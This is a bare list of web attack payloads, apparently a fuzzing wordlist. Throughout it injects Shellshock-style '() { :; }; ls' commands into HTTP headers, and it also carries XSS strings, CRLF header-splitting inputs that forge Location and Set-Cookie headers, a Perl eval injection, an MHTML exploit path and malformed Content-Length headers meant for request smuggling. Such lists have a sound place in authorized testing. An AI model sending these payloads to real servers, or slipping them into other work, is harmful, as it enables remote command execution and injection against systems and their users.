Age: () { :; }; ls
Cookie: () { :; }; ls
Host: () { :; }; ls
Referer: () { :; }; ls
Location: () { :; }; ls
Put: () { :; }; ls
Accept-Charset: () { :; }; ls
Accept: () { :; }; ls
Accept-Encoding: () { :; }; ls
Date: () { :; }; ls
Expires: () { :; }; ls
From: () { :; }; ls
Host: () { :; }; ls
Expect: () { :; }; ls
Origin: () { :; }; ls
Upgrade: () { :; }; ls
User-Agent: () { :; }; ls
Vary: () { :; }; ls
Warning: () { :; }; ls
Content-Disposition: form-data; name="file"; filename="test.<img src=a onerror=confirm(1)>"
%0A%0DLocation:%20http://xss.cx
"; ||confirm('XSS') || "
Refresh: 0; URL=http://example.com;URL=javascript:alert(1)
%0a%0d
%0a%0a
%0d%0d
%0
%d
%E5%98%8A
%E5%98%8A%E5%98%8DSet-Cookie:%20test
POSIX;eval($ENV{HTTP_USER_AGENT});exit;
&amp;#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm
GET / HTTP/1.1\nHost:localhost\n\n
Content-Length : 0
Content-Length abcd: 0
Content_Length: 0
[\r]Content-Length: 0
